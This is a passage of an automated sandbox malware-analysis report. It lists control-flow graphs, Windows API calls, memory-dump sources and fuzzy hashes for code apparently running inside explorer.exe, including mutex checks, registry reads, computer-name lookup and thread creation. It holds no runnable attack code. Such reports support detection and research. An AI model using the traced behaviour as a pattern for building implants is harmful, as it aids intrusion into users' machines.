                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E731
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                        • API String ID: 597776487-239921721
                                                                                                                                                                                                                        • Opcode ID: 1f0d590832dbd3474e92e68c0acd904bf08636459f31871aa744227988efa42c
                                                                                                                                                                                                                        • Instruction ID: 41b5f48786d6209e601cda8117d55db39c50ac2bc739396ca9314e13c840e367
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f0d590832dbd3474e92e68c0acd904bf08636459f31871aa744227988efa42c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0A14F76D00215ABDB24BF65CC45A6EBBBAEF047D4F904469EF01E7280E7719940DF90

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1972 2f1021c-2f10251 GetFileType 1973 2f10257-2f10262 1972->1973 1974 2f10309-2f1030c 1972->1974 1975 2f10284-2f102a0 call 2f0b340 GetFileInformationByHandle 1973->1975 1976 2f10264-2f10275 call 2f10592 1973->1976 1977 2f10335-2f1035d 1974->1977 1978 2f1030e-2f10311 1974->1978 1989 2f10326-2f10333 GetLastError call 2f10c3c 1975->1989 1994 2f102a6-2f102e8 call 2f104e4 call 2f1038c * 3 1975->1994 1992 2f10322-2f10324 1976->1992 1993 2f1027b-2f10282 1976->1993 1979 2f1037a-2f1037c 1977->1979 1980 2f1035f-2f10372 PeekNamedPipe 1977->1980 1978->1977 1983 2f10313-2f10315 1978->1983 1985 2f1037d-2f1038b call 2f096b0 1979->1985 1980->1979 1984 2f10374-2f10377 1980->1984 1988 2f10317-2f1031c call 2f10c72 1983->1988 1983->1989 1984->1979 1988->1992 1989->1992 1992->1985 1993->1975 2006 2f102ed-2f10305 call 2f104b1 1994->2006 2006->1979 2009 2f10307 2006->2009 2009->1992
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02F1014E), ref: 02F1023E
                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 02F10298
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02F1014E,?,000000FF,00000000,00000000), ref: 02F10326
                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 02F1032D
                                                                                                                                                                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02F1036A
                                                                                                                                                                                                                          • Part of subcall function 02F10592: __dosmaperr.LIBCMT ref: 02F105C7
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1206951868-0
                                                                                                                                                                                                                        • Opcode ID: f838cb9011a81258b8182f36a0d6b413db1d946b07a0bba44575a893e16c110e
                                                                                                                                                                                                                        • Instruction ID: db03a91e6ea7d4cef237bfac1a354c612e405a3abcd55f48858ed857c9dd180d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f838cb9011a81258b8182f36a0d6b413db1d946b07a0bba44575a893e16c110e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65414F75904748AFDB24EFA5DC449AFBBF9EF89380B40452EEA56D3610EB309584CB20

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2466 2eec6d0-2eec704 Sleep CreateMutexA GetLastError 2467 2eec706-2eec708 2466->2467 2468 2eec717-2eec718 2466->2468 2467->2468 2469 2eec70a-2eec715 GetLastError 2467->2469 2469->2468 2470 2eec719-2eec720 call 2f0dc4e 2469->2470
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 02EEC6D3
                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,02F46494), ref: 02EEC6F1
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02EEC6F9
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 02EEC70A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorLast$CreateMutexSleep
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3645482037-0
                                                                                                                                                                                                                        • Opcode ID: 96e336ec09b53c17ea0d2c0f0df12f98524c66c5a5df8235003b5d1461d76438
                                                                                                                                                                                                                        • Instruction ID: 029e8eb045134bdeca4dfecda98c3976890cb83b76aa8160be0370fba92b2ac4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96e336ec09b53c17ea0d2c0f0df12f98524c66c5a5df8235003b5d1461d76438
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8E012749C4304DFEA542764A98DB19B667E790B95F705816E60EC6494CFB048948721

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EEC6D0: Sleep.KERNELBASE(00000064), ref: 02EEC6D3
                                                                                                                                                                                                                          • Part of subcall function 02EEC6D0: CreateMutexA.KERNELBASE(00000000,00000000,02F46494), ref: 02EEC6F1
                                                                                                                                                                                                                          • Part of subcall function 02EEC6D0: GetLastError.KERNEL32 ref: 02EEC6F9
                                                                                                                                                                                                                          • Part of subcall function 02EEC6D0: GetLastError.KERNEL32 ref: 02EEC70A
                                                                                                                                                                                                                          • Part of subcall function 02EFF060: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 02EFF142
                                                                                                                                                                                                                          • Part of subcall function 02EFF060: RegCloseKey.KERNELBASE(80000002), ref: 02EFF158
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD
                                                                                                                                                                                                                          • Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894
                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000208A0,00000000,00000000,00000000), ref: 02F00A66
                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00020930,00000000,00000000,00000000), ref: 02F00A77
                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000209C0,00000000,00000000,00000000), ref: 02F00A88
                                                                                                                                                                                                                        • Sleep.KERNELBASE(00007530), ref: 02F00A95
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Create$Thread$ErrorLastOpenSleep$CloseInfoMutexQuery
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2192108483-0
                                                                                                                                                                                                                        • Opcode ID: ef064f2fb263b022bce3684cc80216ab51e39df505282d5db3a1acecae4f05af
                                                                                                                                                                                                                        • Instruction ID: 7ea2a9344f7a994668d544c992ace8515a9c2c7b754687d6d928d15c50c9183d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef064f2fb263b022bce3684cc80216ab51e39df505282d5db3a1acecae4f05af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50F0E572FD4728B6FAB032A54C83F496A465B14FD1F30601AB71E7E1C05DC07500AAEE

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2486 2f1e82b-2f1e87c call 2f26139 2489 2f1e886-2f1e889 2486->2489 2490 2f1e87e-2f1e884 2486->2490 2491 2f1e88b-2f1e88d 2489->2491 2492 2f1e88f-2f1e8a2 call 2f17e35 2489->2492 2493 2f1e8d3-2f1e8e5 2490->2493 2491->2493 2502 2f1e8a4 2492->2502 2503 2f1e8ae-2f1e8c7 call 2f26139 2492->2503 2494 2f1e8f5 call 2f1e6d1 2493->2494 2495 2f1e8e7-2f1e8ea 2493->2495 2501 2f1e8fa-2f1e90f call 2f17c06 call 2f096b0 2494->2501 2495->2494 2497 2f1e8ec-2f1e8f3 call 2f1e430 2495->2497 2497->2501 2506 2f1e8a5-2f1e8ac call 2f17c06 2502->2506 2511 2f1e8c9-2f1e8ca 2503->2511 2512 2f1e8cc-2f1e8cd call 2f17c06 2503->2512 2517 2f1e8d2 2506->2517 2511->2506 2512->2517 2517->2493
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1E8FB
                                                                                                                                                                                                                          • Part of subcall function 02F1E6D1: _free.LIBCMT ref: 02F1E731
                                                                                                                                                                                                                          • Part of subcall function 02F1E6D1: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$InformationTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 597776487-0
                                                                                                                                                                                                                        • Opcode ID: a4f7480fc427fc161b2c3532700340493e0b032f432a9122bbd07989e556855c
                                                                                                                                                                                                                        • Instruction ID: 824674111dd0ce083e45a5a4808035303299f77a69400b511f15c7ed6ae0aad3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4f7480fc427fc161b2c3532700340493e0b032f432a9122bbd07989e556855c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50212972D0032997D724BB749C44DABB7BD9B803F4F900665DF25A3181EB709D448EA0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2518 2f100b4-2f100c0 2519 2f100c2-2f100de call 2f10c5f call 2f10c72 call 2f0ea28 2518->2519 2520 2f100df-2f10103 call 2f0b340 2518->2520 2526 2f10121-2f10143 CreateFileW 2520->2526 2527 2f10105-2f1011f call 2f10c5f call 2f10c72 call 2f0ea28 2520->2527 2528 2f10153-2f1015a call 2f10192 2526->2528 2529 2f10145-2f10149 call 2f1021c 2526->2529 2549 2f1018d-2f10191 2527->2549 2540 2f1015b-2f1015d 2528->2540 2536 2f1014e-2f10151 2529->2536 2536->2540 2542 2f1017f-2f10182 2540->2542 2543 2f1015f-2f1017c call 2f0b340 2540->2543 2547 2f10184-2f10185 CloseHandle 2542->2547 2548 2f1018b 2542->2548 2543->2542 2547->2548 2548->2549
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: c68372a3d80545e1a8c74b76f147445bc6b5bed6a760452152af82ec65d41b3b
                                                                                                                                                                                                                        • Instruction ID: 8bb58e7ed5048cdf523fc578d2384c886fe23cbe455ce5389f31a70216f828d5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c68372a3d80545e1a8c74b76f147445bc6b5bed6a760452152af82ec65d41b3b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09218632900208BAFB116B689C81BAE772AAF417F8F604319FF247B1D0DF745A459E61

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2551 2f163a2-2f163a7 2552 2f163a9-2f163c1 2551->2552 2553 2f163c3-2f163c7 2552->2553 2554 2f163cf-2f163d8 2552->2554 2553->2554 2555 2f163c9-2f163cd 2553->2555 2556 2f163ea 2554->2556 2557 2f163da-2f163dd 2554->2557 2558 2f16448-2f1644c 2555->2558 2561 2f163ec-2f163f9 GetStdHandle 2556->2561 2559 2f163e6-2f163e8 2557->2559 2560 2f163df-2f163e4 2557->2560 2558->2552 2562 2f16452-2f16455 2558->2562 2559->2561 2560->2561 2563 2f16408 2561->2563 2564 2f163fb-2f163fd 2561->2564 2566 2f1640a-2f1640c 2563->2566 2564->2563 2565 2f163ff-2f16406 GetFileType 2564->2565 2565->2566 2567 2f1642a-2f1643c 2566->2567 2568 2f1640e-2f16417 2566->2568 2567->2558 2571 2f1643e-2f16441 2567->2571 2569 2f16419-2f1641d 2568->2569 2570 2f1641f-2f16422 2568->2570 2569->2558 2570->2558 2572 2f16424-2f16428 2570->2572 2571->2558 2572->2558
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 02F163EE
                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 02F16400
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3000768030-0
                                                                                                                                                                                                                        • Opcode ID: fe8ed1b836e1901a26e0ab8dd2d343d1ced9200a889db0e3631984c0de9f811b
                                                                                                                                                                                                                        • Instruction ID: 8a34630b21a13bfc1db518f2df0bbac1d3d3c558bafc8a29d27d91e016aff27d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8ed1b836e1901a26e0ab8dd2d343d1ced9200a889db0e3631984c0de9f811b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09112932A047114EDB304A3E8DD9622BA9CAB522F8F68071EE7B6C22F5C730D486D211

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 2573 2f1038c-2f103a2 2574 2f103b2-2f103c2 FileTimeToSystemTime 2573->2574 2575 2f103a4-2f103a8 2573->2575 2577 2f10402-2f10405 2574->2577 2578 2f103c4-2f103d6 SystemTimeToTzSpecificLocalTime 2574->2578 2575->2574 2576 2f103aa-2f103b0 2575->2576 2579 2f10407-2f10412 call 2f096b0 2576->2579 2577->2579 2578->2577 2580 2f103d8-2f103f8 call 2f10413 2578->2580 2583 2f103fd-2f10400 2580->2583 2583->2579
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,02F102C3,?,?,00000000,00000000), ref: 02F103BA
                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,02F102C3,?,?,00000000,00000000), ref: 02F103CE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                        • Opcode ID: 0cb6ff4537f9c17a91baa6eb405a24f38f6107e13bfa773df1e894bc874039a2
                                                                                                                                                                                                                        • Instruction ID: ef19bcf4bddf682dfc144718922004c17172d9c6bb01554b2cc0a13438edceaf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb6ff4537f9c17a91baa6eb405a24f38f6107e13bfa773df1e894bc874039a2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1011F172D0010CEBDB10DED4C985EDFB7BDAF08354F50466AEA16E6180EB74E685CBA1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetComputerNameExW.KERNEL32(00000002,?,?,F48E75C7,76F90F00), ref: 02EEB2A6
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                                                                                        • Opcode ID: 6084da35c142cd3d8cd9b75eb731e64cb3a361bd76711c721d2eb8a7c86a2aee
                                                                                                                                                                                                                        • Instruction ID: 9a8f85658939b5a44bcf7fe44c55a421cf2b8f1d33bdda098b2819ef422681dc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6084da35c142cd3d8cd9b75eb731e64cb3a361bd76711c721d2eb8a7c86a2aee
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2551B1719412299BCB20DF64DCC87DDB7B5FF58314F5042D9D81AA7290EB74AA80CF90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F1A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02F169C2,00000001,00000364,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84), ref: 02F1A25B
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F19BFE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                                                                                                        • Opcode ID: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
                                                                                                                                                                                                                        • Instruction ID: 23aa8db8a51d01ea6524215ee955108d8cf949a30b91e15444e86b953ca99a1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 112299dda7d8a3aaa9a6c67e080750ada0fe037732b09379cacda0bf255602f7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C016D73A003166BC321CF68C880D89FB98FB043F0F540669E655B76C0D7B0A911CBE0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                        • Opcode ID: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
                                                                                                                                                                                                                        • Instruction ID: 6fcfb7362039bf43b8eb1a1b0bddeb86abff22929259213f238bee52a874be61
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bc9da4f6f1252227d049f80858ae70662f139471ec9298f73f7a1d479842fa2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A01AC72D04218AEDF11AFA4DC017DD7FF59B04350F54416AEE18E11D1EF718680DB91
                                                                                                                                                                                                                        APIs
